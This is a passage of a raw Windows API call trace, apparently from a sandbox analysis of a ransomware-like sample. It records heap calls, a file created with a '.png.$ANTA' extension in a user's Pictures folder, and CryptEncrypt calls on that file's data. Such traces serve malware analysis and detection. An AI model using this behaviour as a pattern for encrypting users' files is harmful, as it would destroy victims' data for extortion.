dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0094.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0094.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0094.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0094.308] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0094.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0094.308] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0094.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0094.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0094.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0094.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0094.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0094.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0094.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0094.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0094.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0094.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0094.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0094.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0094.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0094.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0094.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0094.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0094.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0094.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0094.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0094.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0094.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0094.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0094.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0094.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0094.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0094.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0094.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0094.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0094.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a47b0 [0094.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0094.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0094.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0094.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0094.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a47b0 | out: hHeap=0x1780000) returned 1 [0094.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0094.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0094.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0094.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0094.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0094.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0094.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0094.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0094.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0094.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0094.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369f80 [0094.310] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz")) returned 0x10 [0094.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369f80 | out: hHeap=0x1780000) returned 1 [0094.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0094.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0094.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0094.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0094.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0094.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0094.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0094.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0094.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0094.311] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\J06YyOv018ZbSPW7yM.png.$ANTA" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\j06yyov018zbspw7ym.png.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0094.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0094.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0094.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0094.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0094.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0094.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0094.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0094.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0094.312] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0094.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0094.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0094.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0094.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0094.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0094.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0094.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0094.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0094.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0094.312] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0094.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac180 | out: hHeap=0x1780000) returned 1 [0094.312] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0094.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0094.313] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0094.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0094.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0094.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0094.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0094.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0094.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0094.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0094.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0094.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0094.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0094.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0094.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0094.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0094.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0094.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0094.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e05020 [0094.317] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0094.317] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0x541d, lpOverlapped=0x0) returned 1 [0094.318] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0094.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0094.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0094.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0094.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0094.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x541d) returned 0x4516010 [0094.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e05020 | out: hHeap=0x1780000) returned 1 [0094.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0094.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0094.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0094.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0094.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0094.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x541d) returned 0x451b438 [0094.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0094.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0094.322] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0094.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0094.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0094.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0094.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0094.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0094.322] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x541d) returned 0x4516010 [0094.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0094.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0094.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0094.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0094.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0094.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0094.323] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0094.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0094.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0094.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0094.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0094.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0094.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0094.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0094.323] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0094.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0094.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0094.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0094.323] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0094.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d20 | out: hHeap=0x1780000) returned 1 [0094.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0094.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0094.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25c0 [0094.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0094.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0094.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0094.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0094.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x541d) returned 0x4516010 [0094.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0094.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2550 [0094.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0094.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0094.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0094.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2720 [0094.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0094.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0094.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0094.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2680 [0094.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0094.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0094.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0094.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca868 [0094.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0094.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0094.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0094.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0094.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0094.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x541d) returned 0x4520860 [0094.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0094.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0094.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0094.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0094.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0094.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0094.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0094.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0094.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0094.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0094.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0094.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0094.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0094.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0094.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0094.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0094.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0094.325] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0094.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0094.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0094.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0094.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0094.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0094.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0094.326] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0094.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0094.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0094.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0094.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0094.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0094.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0094.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0094.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0094.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0094.326] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0094.326] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0094.326] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0094.326] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0094.327] CryptGetKeyParam (in: hKey=0x41ac140, dwParam=0x7, pbData=0x43e2870, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e2870*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0094.372] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0094.372] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0094.372] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0094.372] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0094.372] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0094.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cabc8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0094.372] CryptEncrypt (in: hKey=0x41ac140, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0x541d, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0x5420) returned 1 [0094.372] CharLowerBuffW (in: lpsz="byte[21537]", cchLength=0xb | out: lpsz="byte[21537]") returned 0xb [0094.372] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0094.372] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 